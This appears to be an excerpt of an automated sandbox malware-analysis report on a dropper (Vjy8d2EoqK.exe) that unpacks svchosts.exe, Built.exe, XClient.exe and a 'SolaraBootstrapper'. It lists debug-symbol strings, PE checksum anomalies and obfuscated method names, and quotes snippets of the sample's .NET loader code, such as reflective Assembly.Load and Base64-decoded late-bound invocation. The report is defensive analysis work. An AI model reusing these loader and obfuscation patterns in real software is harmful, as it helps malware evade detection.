Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Vjy8d2EoqK.exe, 00000000.00000003.1694720616.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchosts.exe, 00000002.00000003.1703373977.0000000006D29000.00000004.00000020.00020000.00000000.sdmp, svchosts.exe, 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmp, svchosts.exe, 00000002.00000000.1694475780.00000000002C3000.00000002.00000001.01000000.00000006.sdmp, svchosts.exe, 00000002.00000003.1704318738.00000000055C7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Built.exe, 00000003.00000002.2060889895.00007FFDF7140000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Built.exe
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: Built.exe, 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: Built.exe, 00000003.00000002.2063693974.00007FFDF7460000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbv source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Built.exe, 00000001.00000003.1690578642.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2073776444.00007FFE13311000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Built.exe, 00000001.00000003.1690578642.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2073776444.00007FFE13311000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: symbols\dll\mscorlib.pdbpdb` source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-1_1.pdb source: Built.exe, Built.exe, 00000003.00000002.2063693974.00007FFDF74E2000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: .pdb! source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: Built.exe, 00000003.00000002.2066532868.00007FFDFB63B000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb source: Built.exe, Built.exe, 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: Built.exe, 00000003.00000002.2072519669.00007FFE130C1000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: Built.exe, 00000003.00000002.2063693974.00007FFDF7460000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Built.exe, 00000003.00000002.2073120722.00007FFE13221000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Built.exe, Built.exe, 00000003.00000002.2068139696.00007FFE10301000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: XClient.exe, 00000006.00000002.2805106909.000000000137B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbzS source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Built.exe, 00000003.00000002.2071781331.00007FFE126EC000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb6SK source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Built.exe, 00000003.00000002.2072230759.00007FFE12E11000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Built.exe, 00000003.00000002.2071781331.00007FFE126EC000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Built.exe, 00000003.00000002.2069831298.00007FFE11ED1000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbxC source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb+ source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Built.exe, 00000003.00000002.2068410527.00007FFE11511000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Built.exe, 00000003.00000002.2068979662.00007FFE11EA1000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: indoC:\Windows\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Built.exe, Built.exe, 00000003.00000002.2067833752.00007FFE10241000.00000040.00000001.01000000.00000019.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, JrCZwsIvjVF3h1G2N1o.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{WVLhEOUW7kSTjheFow9MPM._3wVPV9O1Btwc67v7Rkl2yv,WVLhEOUW7kSTjheFow9MPM.i5cpgVlNzZBHY37BjHySvz,WVLhEOUW7kSTjheFow9MPM.lYEDz9R4YBUwueunC5bjTx,WVLhEOUW7kSTjheFow9MPM.Tv35SK75a97ZHPINyZNVLP,NlOekkeE5O7s901dhU6uz3._68dLv7zBjvWAxH3b1q2lxa()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rMs6XE5PBmVr0JdmdUuJWr[2],NlOekkeE5O7s901dhU6uz3.q8I1g5z0j0F2IdHL9YTlDh(Convert.FromBase64String(rMs6XE5PBmVr0JdmdUuJWr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rMs6XE5PBmVr0JdmdUuJWr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{WVLhEOUW7kSTjheFow9MPM._3wVPV9O1Btwc67v7Rkl2yv,WVLhEOUW7kSTjheFow9MPM.i5cpgVlNzZBHY37BjHySvz,WVLhEOUW7kSTjheFow9MPM.lYEDz9R4YBUwueunC5bjTx,WVLhEOUW7kSTjheFow9MPM.Tv35SK75a97ZHPINyZNVLP,NlOekkeE5O7s901dhU6uz3._68dLv7zBjvWAxH3b1q2lxa()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rMs6XE5PBmVr0JdmdUuJWr[2],NlOekkeE5O7s901dhU6uz3.q8I1g5z0j0F2IdHL9YTlDh(Convert.FromBase64String(rMs6XE5PBmVr0JdmdUuJWr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rMs6XE5PBmVr0JdmdUuJWr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, JrCZwsIvjVF3h1G2N1o.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Up9XJDYCHy8FYkARRnc.cs	.Net Code: s66tDybuig System.AppDomain.Load(byte[])
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Up9XJDYCHy8FYkARRnc.cs	.Net Code: s66tDybuig System.Reflection.Assembly.Load(byte[])
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Up9XJDYCHy8FYkARRnc.cs	.Net Code: s66tDybuig
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: tiOwy7RdbMiZ1z023lmQm2 System.AppDomain.Load(byte[])
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: _8w2gGBofp0eLL7L4VoyOGO System.AppDomain.Load(byte[])
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: _8w2gGBofp0eLL7L4VoyOGO
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: tiOwy7RdbMiZ1z023lmQm2 System.AppDomain.Load(byte[])
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: _8w2gGBofp0eLL7L4VoyOGO System.AppDomain.Load(byte[])
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	.Net Code: _8w2gGBofp0eLL7L4VoyOGO
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Up9XJDYCHy8FYkARRnc.cs	.Net Code: s66tDybuig System.AppDomain.Load(byte[])
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Up9XJDYCHy8FYkARRnc.cs	.Net Code: s66tDybuig System.Reflection.Assembly.Load(byte[])
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Up9XJDYCHy8FYkARRnc.cs	.Net Code: s66tDybuig

Source: C:\Users\user\AppData\Local\Temp\svchosts.exe

File created: C:\Brokercrt\__tmp_rar_sfx_access_check_6475453

Jump to behavior

Source: S l r .exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1a4e1
Source: libffi-8.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: svchosts.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x123413
Source: sqlite3.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x9c6f9
Source: libcrypto-1_1.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x118790
Source: Built.exe.0.dr	Static PE information: real checksum: 0x6e1a3c should be: 0x6d912c
Source: libssl-1_1.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x3bfea
Source: _ssl.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x1a089
Source: Vjy8d2EoqK.exe	Static PE information: real checksum: 0x0 should be: 0x80fe1e
Source: python311.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x1a1a97

Source: svchosts.exe.0.dr	Static PE information: section name: .didat
Source: libffi-8.dll.1.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.1.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002AE28C push eax; ret	2_2_002AE2AA
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002ACAC7 push eax; retf 002Ah	2_2_002ACACE
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002AED46 push ecx; ret	2_2_002AED59
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035F76 push r8; ret	3_2_00007FFDF7035F83
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035FB9 push r10; ret	3_2_00007FFDF7035FCC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7037FEB push r12; ret	3_2_00007FFDF7038036
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF703767B push r12; ret	3_2_00007FFDF70376BF
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035EAD push rsp; iretd	3_2_00007FFDF7035EAE
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035EBC push rsi; ret	3_2_00007FFDF7035EBD
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035EFA push r12; ret	3_2_00007FFDF7035F07
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7038F28 push rsp; iretq	3_2_00007FFDF7038F29
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7037F53 push rbp; iretq	3_2_00007FFDF7037F54
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035F56 push r12; ret	3_2_00007FFDF7035F6E
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7038DA5 push rsp; retf	3_2_00007FFDF7038DA6
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035DF7 push r10; retf	3_2_00007FFDF7035DFA
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035E0F push rsp; ret	3_2_00007FFDF7035E17
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7037630 push rbp; retf	3_2_00007FFDF7037649
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035E58 push rdi; iretd	3_2_00007FFDF7035E5A
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035CE0 push r10; retf	3_2_00007FFDF7035CE2
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035CE5 push r8; ret	3_2_00007FFDF7035CEB
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035CFE push rdx; ret	3_2_00007FFDF7035D01
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035D06 push r12; ret	3_2_00007FFDF7035D08
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7038405 push r10; retf	3_2_00007FFDF7038471
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7035C31 push r10; ret	3_2_00007FFDF7035C33
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF70382C4 push rdi; iretd	3_2_00007FFDF70382C6
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF703930D push rsp; ret	3_2_00007FFDF703930E
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7038077 push r12; iretd	3_2_00007FFDF703808B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF703685F push rsi; ret	3_2_00007FFDF7036896
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 6_2_00007FFD9B2A5A08 push esi; retf 5F4Dh	6_2_00007FFD9B2A5AD7
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 6_2_00007FFD9B2A39CD push E95E5205h; ret	6_2_00007FFD9B2A3A39
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD9B17D2A5 pushad ; iretd	17_2_00007FFD9B17D2A6

Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, JV0vfytHnkICvCjUiWq.cs	High entropy of concatenated method names: 'iFWUnNTmBd', 'WxeUWBksXN', 'ojgUQF3XDb', 'RanV0vXDHGRrq0jLTdA', 'JTr6JdXhbQlyYimSYAo', 'Kx6AbEXKBWOXQ7MXlnI', 'EujorgXUjCMPvYrSmhe', 'KiLUAGxrgd', 'dB8Ue2gjLp', 'nqwUfESXJk'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, t5BmhM71RBVutNWcVVM.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, vmUoogMoZ7t63nhJ2fA.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'oYI48Fqn1AkaVIYuG1m', 'idjhejqMKboHpoubPJp', 'xTZ9NwqfM0sune0tTDs', 'gGFvatqoJjeykC2nRpq', 'MqqSMeq71V5Pam8Sl9W', 'fGeUk0q4dZmdZb9QEQ7'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, GHDOQSOKt60AmXixKaY.cs	High entropy of concatenated method names: 'HKISFgTYJM', 'KjSSblskpP', 'FhiSX9mp8U', 'YHPSulBGGi', 'WqHS2ZCmYX', 'ppHSPY4VhT', '_838', 'vVb', 'g24', '_9oL'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, oAixKhMgi1NyrkQL9eb.cs	High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'apnd3KFxC0ib8CxMJlj', 'rRXTjsFCPEQkYEPoMAT', 'Inl3tBFbRqQq5IcOiSD', 'k8XCBEFciXd5oe3tMk7', 'tMMiguFpsRyLUbGCfLf', 'm9NgJRF6svPh8o6Vglc'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, TGn25mMBn6ddL6qT9pa.cs	High entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'BPcx57GHYBWsX1XdBlQ', 'RGJwLhGsujYQktn6MB8', 'bybZmoGqe8ORibCuya3', 'zd6A5jGFijHxm5I5kJr', 'oAYpImGdNSv9tapAUU5', 'svwpFUGQl3D2rXn7xbO'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, yYprVsY8wfpeqvUvLdV.cs	High entropy of concatenated method names: 'UlFOUULXpo', 'c5AOCbcvYa', 'WCZQsqSY7FnIkp3cq0k', 'WpGwGVS2XEl5YwW8gmA', 'PAfH4MSNmsYCiwGrcW4', 'IVkXO6S3ReRXb6UjHgI', 'ieTOf0R1rG', 'Be17iwkrs8oL4thcFDU', 'LAwKSRkyY1agqf0Ih6B', 'cQ1M6ySaTHNmZV871Wx'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, uP2t2kBiaYKpOZqHv2.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'YFnsRVdSlDpb5eZTVO9', 'Y6W9QTdkMln5Mx6BiPp', 'jZPms7dAL1Jj5l0Tkt6', 'SeAqvOdWETD1rMQoI74', 'KNFTbjdXSo2ohl0kyOv', 'UAnw40dg3yQNvW5M31d'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, vQ5JZIGo3TYjJWFHUt.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'GLFZvTQ7iiQKxZH4air', 'dbSnLfQ4UGOIPDLMASP', 'Xwd5B5QlTby67F6XpEE', 'jJc87bQwr9o7olRkRLk', 'vpvPmoQZRYwTkvkqk5j', 'ztIImSQLVcswcD1mBKU'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, XFvZebYrmb4tpAtIe6b.cs	High entropy of concatenated method names: 'FlIivjPLEi', 'RHCiDyPdtv', 'cB0y6XUn4rQ0LCYVQNl', 'yXURuYUMFEqWh4KEpjX', 'rac6WOUtoZdeYlr8D6f', 'jmRHXBUvZgtFYFCWJk2', 'Ibu4tmUfa7EEiTZOQjd', 'J7G3DWUoIhdGnDBXT0C', 'kY1FcKU7fQHlU7s01cY', 'Fu8UI2U4dR3J3wRlpq3'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, xMCSNetqeYm9kSYvTZy.cs	High entropy of concatenated method names: 'jGDCa7uv8P', 'f9oCnnJcSq', 'xyCUDKtkZ1bTIDISVko', 'hxX55PtAQpAxupZJDOC', 'VepZQEtJEf5ZmgKljRq', 'dj3JKwtSKoIkoueTCl3', 'TwFKkjtW5ANY55dNWFQ', 'VhMr0QtXMxuvcXAkW8Y'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, hluG387c2TQXKLfFIi5.cs	High entropy of concatenated method names: 'xncSdchc35', 'Wv4SgmjsWg', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'paES5JOGJN', '_5f9', 'A6Y'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, lCQ1k2MuDYFt4bD2Mgy.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'U92r22GXT4ASrWuSdim', 'uV3VSGGg876qwqbxEC2', 'BNsGgYGtcP4pd2FaxDM', 'mk597YGvKvbkiVkU67c', 'pB3fxWGnTrZ3co24OFp', 'jtQEjdGMD9fl2bS5OiF'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, HdMPAIYlghUAXdOGxdo.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'ryD7WXWLKK', 'iFo7QWQdMP', 'oIg7RhUAXd', 'fGx7ldoqUH', 'LPF7wPQnk0', 'iJbLDpSFG9LCEH55Kq1', 'w1CtNqSOI03vewwmMu4', 'HPytOUSswM1o7t4Jwo5'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, ReNpgNOOA8EeOiEY4Ra.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, WWoKZddyLRPo3RO1co.cs	High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'GM8S4DeG5SQGInOffEo', 'zs2ES4e9S9falIQkNHh', 'GqP92Yehv1GsdZ35fT9', 'IfDxVheKTjLsLjK2fZp', 'g5dt9feDHC8v7TjOEa2', 'zpcrFEeUlVDi94De0yY'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, mtgj6SMmZrhn9Txbl5Q.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'XusEDKqr6IDw5QCWFLw', 'yfLDS3qybeqAm5ppxxR', 'K03RpFqeARtCd8Wqo6U', 'P7FdZUqIjabVYQe8jFu', 'qfRJKGqdktvRWTdM9DD', 'atfdYTqQ4Nrb06qW7t0'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, EYr9r3ty9eqCxR6EynV.cs	High entropy of concatenated method names: 'IQDe6dnCGvm0veLHhp0', 'tOPpc4nbY6dnQAOdJ8E', 'A6uj3Wn0baV6Mvy2Nof', 'DnLF64nxugP8OquqONE', 'IWF', 'j72', 'XmBHf7apKZ', 'Ik9HmGvNg3', 'j4z', 'D5dH9eJoyo'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, IawrD3OYOmJuHWNhaid.cs	High entropy of concatenated method names: 'TCVJUPiAOi', 'MZ4JCvLjMo', '_8r1', 'trWJHqF0dx', 'ALfJpLQUtt', 'WaQJjtw0aM', 'fw0J4fPRh4', 'N7FsF3p8vxRc3XZSju9', 'dfCBXwpJDtb8uUBHDeh', 'D8LCknpSPiRJqqDD33h'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Dw8AKEORyFmKNrU2tn9.cs	High entropy of concatenated method names: 'QrOgl4LGEl', 'ge1d8nVlQeHQacOwhyT', 'Ac6jf9Vw7SLjcQPFEDs', 'HoQOr8V7Vyd5nmUSKO8', 'F3FxCWV4BQ1og3oC6We', '_1fi', 'GfhdP7BMQ7', '_676', 'IG9', 'mdP'
